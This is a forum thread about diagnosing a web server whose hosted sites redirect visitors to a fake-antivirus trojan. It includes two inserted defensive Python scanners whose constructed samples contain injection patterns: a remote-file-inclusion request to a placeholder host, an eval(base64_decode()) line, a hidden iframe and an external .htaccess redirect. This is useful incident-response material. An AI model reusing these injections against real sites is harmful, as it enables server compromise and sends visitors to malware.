LinuxQuestions.org, Linux - Security forum
This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
09-30-2009, 08:37 PM   #1
Dragnovich (LQ Newbie)
Virus in a server? Malware running randomly in all server sites.

Hello, I have one CentOS machine with Plesk 8.6 (preinstalled from The Planet).

The sites on that server are randomly (and frequently) serving a page redirect that points to a malware site:

http://antispywaretotalscan9.com/sca...LjI4Ng0MaA%3DN

which claims to be antivirus software but really is a trojan.

The number in ...totalscanX.com/... changes from 0 to 9; even so, if you try a few times the site is down (it seems that it changes IPs, using free IP proxies and free DNS servers). When the site is opened it gets very persistent in leaving the user no choice but to click the download and install button (normal users don't realize that it is a WEBSITE and the messages are browser alerts), and the way to avoid it is just hitting the back button.

Ok, this is how it is working:

1) It runs randomly, on random sites, pages and scripts. I.e.: I was editing with vi a file containing <?php phpinfo(); ?> and when I tested the page I got the malware redirection.
2) The script DOES NOT MODIFY or affect the file requested, so I'm worried that the file is being run server-wide.
3) The malware page goes up and down, also randomly.
4) The first time I detected a suspicious Tomcat process, and the virus was displayed very often; once I shut down Tomcat the propagation slowed down nearly to nothing (but still occurs).
5) It is not a local machine virus (Windows); I checked the pages from many machines, on many networks, and always got it after a while.

What have I done to test?...

First I thought my FTP account was compromised, so I changed my passwords. I verified the integrity of all my files and found nothing...
After a while I started getting the malware redirections on my site again, so I started monitoring all server FTP access logs, to see if the malware connects, uploads, and after some time deletes itself. But after that, I found 0 FTP accesses and still got the malware from the same phpinfo file.

I also tried the PHP/Apache configuration files, to see if there are suspicious files that are appended to each served page, but got nothing.

I checked all server processes and found nothing suspicious.

A friend told me maybe the kernel was corrupted? But how to find out if it was modified?

Any ideas what more to do?
 
09-30-2009, 08:56 PM   #2
jalalski (LQ Newbie)
Two options

In my opinion, you only have two options:

1. completely wipe the machine and do a new install, with new passwords, everything.

2. Employ an expensive security expert to audit the machine and, if possible, fix it.

A security expert will probably find the source of the problem and then insist that you do a reinstall anyway, so you might as well skip that and do it yourself.

(If you are calling a file containing phpinfo() and getting a redirect to another site, it indicates either a .htaccess redirect or URL rewrite, or a modified Apache installation.)

Good luck.
 
09-30-2009, 09:00 PM   #3
gmartin (Member, Slackware 13.37)
Not too likely, but it's possible you have been rooted. It can be impossible to detect. But there are some good tools to try detection. See here and here

Most of those tools should be run from a LiveCD so the rootkit isn't active.

Also, on possible infection vectors, are you running a CMS that could have a vulnerability? I've seen php apps that you could drive a truck through.
 
09-30-2009, 11:55 PM   #4
Dragnovich (LQ Newbie, Original Poster)
Yes, the possibility of a reinstallation is taken care of... but it will be the last resort...

Ok, I ran rkhunter and besides some warnings (that seem to be reported for everyone who has run it on a CentOS/Plesk server, as seen in a Google search) there's nothing suspect.

This is what I get...
[21:14:49] /usr/bin/GET [ Warning ]
[21:14:49] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
[21:14:49] /usr/bin/groups [ Warning ]
[21:14:49] Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
[21:14:50] /usr/bin/ldd [ Warning ]
[21:14:50] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
[21:14:55] /usr/bin/whatis [ Warning ]
[21:14:56] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
[21:14:57] /sbin/ifdown [ Warning ]
[21:14:57] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[21:14:57] /sbin/ifup [ Warning ]
[21:14:58] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
[21:16:07] Checking '/etc/xinetd.d/ftp_psa' for enabled services [ Warning ]
[21:16:07] Checking '/etc/xinetd.d/poppassd_psa' for enabled services [ Warning ]
[21:16:07] Checking '/etc/xinetd.d/smtp' for enabled services [ Warning ]
[21:16:07] Checking '/etc/xinetd.d/smtp_psa_alt' for enabled services [ Warning ]
[21:16:07] Checking '/etc/xinetd.d/smtps_psa' for enabled services [ Warning ]
[21:16:08] Checking '/etc/xinetd.d/smtp_telcel' for enabled services [ Warning ]
[21:16:08] Checking '/etc/xinetd.d/submission_psa' for enabled services [ Warning ]
[21:16:08] Checking for enabled xinetd services [ Warning ]
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/poppassd_psa
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/smtp
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_psa_alt
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/smtps_psa
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_telcel
[21:16:08] Warning: Found enabled xinetd service: /etc/xinetd.d/submission_psa
[21:16:37] Checking if SSH root access is allowed [ Warning ]
[21:16:37] Warning: The SSH and rkhunter configuration options should be the same:
[21:16:38] Checking for hidden files and directories [ Warning ]
[21:16:38] Warning: Hidden directory found: /dev/.udev
[21:16:38] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression

About the CMS or PHP backdoor... Yes, it occurs to me that maybe an Apache/PHP file is the cause; however, I don't know any way to find out which file is being run by Apache. When searching for Apache processes all I get is that it is running from the path /usr/bin/httpd.

Any ideas?
 
10-01-2009, 11:11 AM   #5
unSpawn (Moderator)
Quote, originally posted by jalalski:
"completely wipe the machine and do a new install, with new passwords, everything."
Bad advice. If you do that without knowing the cause and hardening against it you're bound to introduce it again.


Quote, originally posted by jalalski:
"Employ an expensive security expert to audit the machine and, if possible, fix it."
Not necessary unless you know your stuff. Ninety-nine percent of the time it'll be vulns that are well known and have been around for some time.
 
10-01-2009, 11:23 AM   #6
unSpawn (Moderator)
Quote, originally posted by gmartin:
"Also, on possible infection vectors, are you running a CMS that could have a vulnerability? I've seen php apps that you could drive a truck through."
As I've said before PHP stands for Pretty Horrific Programming and all software the user runs should be regarded as suspect. Quick wins are 0) comparing exact versions of PHP and PHP-based applications with the CVE (or distribution or vendor-issued security bulletins) and 1) grepping webserver access and error logs for "odd" GET/POST requests, errors, tool output (think wget).
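One way to do the log grep unSpawn suggests, as an added example that is not from anyone in this thread: a Python pass over Apache combined-format access log lines that flags POSTs to script files, download-tool user agents (wget and friends) and URLs passed as query parameters. The log lines, hostnames and IP addresses are constructed for illustration.

```python
import re
from collections import Counter
# Apache combined log format; one regex group per field we need.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
SCRIPT_EXT = ('.php', '.cgi', '.pl', '.js')                 # file types the thread saw abused via POST
TOOL_UA = ('wget', 'curl', 'libwww-perl', 'python-urllib')  # "think wget"

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def flag(rec):
    """Reasons one parsed record looks odd; an empty list means it looks normal."""
    reasons = []
    path = rec['path'].split('?', 1)[0].lower()
    if rec['method'] == 'POST' and path.endswith(SCRIPT_EXT):
        reasons.append('POST to script file')
    if any(t in rec['ua'].lower() for t in TOOL_UA):
        reasons.append('download-tool user agent')
    if re.search(r'=https?://', rec['path'], re.I):
        reasons.append('URL passed as query parameter')
    return reasons

def triage(lines):
    """Map each flagged line to its reasons and count flagged requests per client IP."""
    hits, per_ip = {}, Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue                       # not combined format; skip rather than guess
        reasons = flag(rec)
        if reasons:
            hits[line] = reasons
            per_ip[rec['ip']] += 1
    return hits, per_ip

# Constructed sample lines (RFC 5737 documentation addresses), not the poster's real logs.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Oct/2009:03:12:44 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Oct/2009:03:13:01 -0500] "POST /images/x.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [01/Oct/2009:03:13:05 -0500] "GET /lib/inc.php?page=http://bad.example/c.txt HTTP/1.1" 200 88 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [01/Oct/2009:03:14:10 -0500] "GET /robots.txt HTTP/1.1" 200 42 "-" "Wget/1.11"',
]

if __name__ == '__main__':
    hits, per_ip = triage(SAMPLE_LOG)
    for line, reasons in hits.items():
        print(line.split('"')[1], '->', ', '.join(reasons))
    print('flagged requests per IP:', dict(per_ip))
```

Pipe a real access_log through `triage` line by line and sort `per_ip` to see which clients keep hitting script files with POSTs.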
 
10-01-2009, 10:11 PM   #7
jalalski (LQ Newbie)
Quote, originally posted by unSpawn:
"Bad advice. If you do that without knowing the cause and hardening against it you're bound to introduce it again."
See the second option.

It's the only correct way to treat a possibly rooted machine. If you have the skills to find the source of the infection, then good. If you have the money to pay someone, good.

Otherwise, just reinstall the system, set up new accounts with fresh passwords and check all user space scripts and programs for attack vectors.
 
10-01-2009, 11:05 PM   #8
win32sux (Guru)
Quote, originally posted by jalalski:
"See the second option.

It's the only correct way to treat a possibly rooted machine. If you have the skills to find the source of the infection, then good. If you have the money to pay someone, good.

Otherwise, just reinstall the system, set up new accounts with fresh passwords and check all user space scripts and programs for attack vectors."
As unSpawn said, that approach is quite likely to leave you (and your clients) just as vulnerable as before. IMHO, it's extremely irresponsible to put a restored/re-installed system back online without having addressed the vulnerability which was exploited. One doesn't need to be a forensic expert either. Some basic investigative techniques (such as those mentioned by unSpawn) can shed a significant amount of light on what went wrong and why. Once you have a decent theory which is supported by solid evidence, you'll know what needs to be done differently on the new install.

 
10-03-2009, 09:26 PM   #9
jalalski (LQ Newbie)
By 'system' I meant the operating system, not the, probably corrupted, data files. Maybe I didn't make that clear.
 
10-05-2009, 02:59 AM   #10
Dragnovich (LQ Newbie, Original Poster)
Well, the problem got solved, for the moment.

Here is what happened...

Basically the server was being attacked by some kind of variation of the Goscanpark malware or the Beladen attack. I truly don't find ANY reference to a virus like the one I got.

Anyway, those variations attack a server vulnerability in the default php.ini configuration (as I said, the server is leased at ThePlanet, so I got it as is, with default factory settings).

After a while I managed to stop the attack.

Basically the attacker hacked some FTP account passwords (weak passwords, I think) on the server and then populated his "malware" in the .JS, .PHP, Java and .CGI files (yes, that surprised me too... Java? PERL?). The compromised scripts are called from the outside using the POST method, so there is no visible suspicious access in the logs.

Once the script is running it makes all possible scans to search for any open backdoor: whether it can execute other scripts, whether it has FTP access, whether it has system access, searching for writable directories, etc., and sends back a report, to make it easier for the attacker on the next run.

Basically the script gets by POST the next script it will execute, so it is not possible to track what is really happening; it can be a batch of 1000 spam emails, a URL redirection, a fake web page or a Google AdWords impersonation; ANYTHING can happen.

Anyway, they get run randomly, and many times, but from many different IPs. It is very difficult to track this, because many customers have PHP-based open source apps running and no one can handle the job of TRACKING every PHP file served.

The worst part is that the script attacks server-wide, so once the script has run, it hijacks Apache requests SERVER-WIDE and returns malicious content on any served page to the web browsers instead of the real web pages. This means that the attacker's script is running on SITE1.COM and reflecting the attacks on ANY site on the server (so if you have a 200+ site server...).

What did I do?
Installed Breakinguard, and set the failed-password tries to 5 to block the IP (just to locate the compromised FTP accounts, but using this method I got just one of the 3 I located; there could be more), then I changed all server FTP passwords, restricted FTP user rights even more, and removed the use of the PHP "execution" functions.

After restricting PHP the attack stopped, and that let me track back what happened.

After that started the complaints of customers that their buggy open source software had stopped working, but that is another story.

I post some resources to learn more about these exploits:

The article that showed me the light at the end of the tunnel:
http://blog.unmaskparasites.com/2009...erver-exploit/

In fact the whole blog is a GOLD MINE of knowledge:
http://blog.unmaskparasites.com/

And their online detection tool is a must:
http://www.unmaskparasites.com/

Other references:
Linux Apache Attack
http://www.uptime.cz/100452-site-a-i...he-Attack.html

Beladen Elusive Web Server Exploit. (information for site owners and hosting providers)
http://blog.unmaskparasites.com/2009...erver-exploit/
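An added example (not the poster's tooling, nor from any linked article) that covers both jalalski's point earlier in the thread that a redirecting phpinfo() page suggests a .htaccess redirect, and the injected .js/.php/.cgi files described in this post: it walks a web root and reports files carrying common injection markers, and .htaccess rules that send visitors to an external host. The web root and its contents are constructed in a temporary directory; the host bad.example and the base64 string (which decodes to a harmless "echo 1;") are placeholders.

```python
import os, re, tempfile
SCRIPT_EXT = ('.php', '.js', '.cgi', '.pl')   # the file types the thread saw modified
INJECT_PATTERNS = [
    ('eval of decoded payload', re.compile(r'eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(', re.I)),
    ('hidden iframe', re.compile(r'<iframe[^>]+(visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*["\']?0)', re.I)),
]
# A RewriteRule/Redirect whose target is an absolute URL sends visitors off the server.
HTACCESS_REDIRECT = re.compile(r'^\s*(RewriteRule|Redirect(Match)?)\s+\S+\s+https?://', re.I | re.M)

def scan_file(path):
    """Return the list of finding labels for one file (empty if nothing matched)."""
    with open(path, 'r', errors='replace') as fh:
        data = fh.read()
    name = os.path.basename(path)
    if name == '.htaccess':
        return ['redirect to external host'] if HTACCESS_REDIRECT.search(data) else []
    if name.lower().endswith(SCRIPT_EXT):
        return [label for label, pat in INJECT_PATTERNS if pat.search(data)]
    return []

def scan_tree(root):
    """Map path relative to root -> findings, for every flagged file under root."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            full = os.path.join(dirpath, f)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings

def build_sample_root():
    """Construct a throwaway web root: one clean file, two injected scripts, one bad .htaccess."""
    root = tempfile.mkdtemp(prefix='webroot-')
    samples = {  # constructed sample content; the base64 string is a harmless placeholder
        'index.php': '<?php echo "hello"; ?>',
        'inc/config.php': '<?php $db = "x"; ?>\n<?php eval(base64_decode("ZWNobyAxOw==")); ?>',
        'js/menu.js': 'var m = 1;\ndocument.write(\'<iframe src="http://bad.example/" width=0 height=0></iframe>\');',
        '.htaccess': 'RewriteEngine On\nRewriteRule ^(.*)$ http://bad.example/$1 [R,L]',
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w') as fh:
            fh.write(body)
    return root

if __name__ == '__main__':
    for rel, hits in sorted(scan_tree(build_sample_root()).items()):
        print(rel, '->', ', '.join(hits))
```

Point `scan_tree` at a real vhost document root and compare each flagged file against a clean copy from backup or the application's release tarball before deciding it is injected; the patterns are indicators, not proof.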
 
10-05-2009, 10:08 PM   #11
jalalski (LQ Newbie)
Glad you got it sorted.

And thanks for posting the info, that will help many.
 
10-06-2009, 03:52 PM   #12
unSpawn (Moderator)
Quote, originally posted by Dragnovich:
"Basically the attacker hacked some FTP account passwords (weak passwords, I think) on the server and then populated his "malware" in the .JS, .PHP, Java and .CGI files (yes, that surprised me too... Java? PERL?). The compromised scripts are called from the outside using the POST method, so there is no visible suspicious access in the logs."
Thanks for the links. Just to be clear the discussions do not point to a direct route into a GNU/Linux server by way of exploiting a weakness but to exploiting vulns in (I'd guess mostly mcrsft) clients used for content upload or editing.
 